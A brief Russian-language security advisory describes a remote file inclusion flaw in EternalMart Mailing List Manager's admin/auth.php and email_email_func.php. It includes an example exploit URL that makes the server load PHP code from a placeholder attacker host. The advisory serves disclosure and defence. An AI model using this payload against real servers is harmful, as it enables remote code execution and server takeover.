Удаленное выполнение произвольного PHP кода в EternalMart Mailing List Manager

Описание: Уязвимость включения произвольных файлов обнаружена в EternalMart Mailing List Manager. Удаленный пользователь может выполнить произвольный PHP код на системе.

Сценарии 'email_email_func.php' file и 'admin/auth.php' не проверяют местоположение PHP файла, включаемого в переменных $emml_path и $emml_admin_path соответственно. В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

Пример/Эксплоит:

http://[target]/admin/auth.php?emml_admin_path=http://[attacker]

где: 
http://[attacker]/auth_func.php

URL производителя: http://www.eternalmart.com/scripts/emml.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно найти на http://www.phpsecure.info.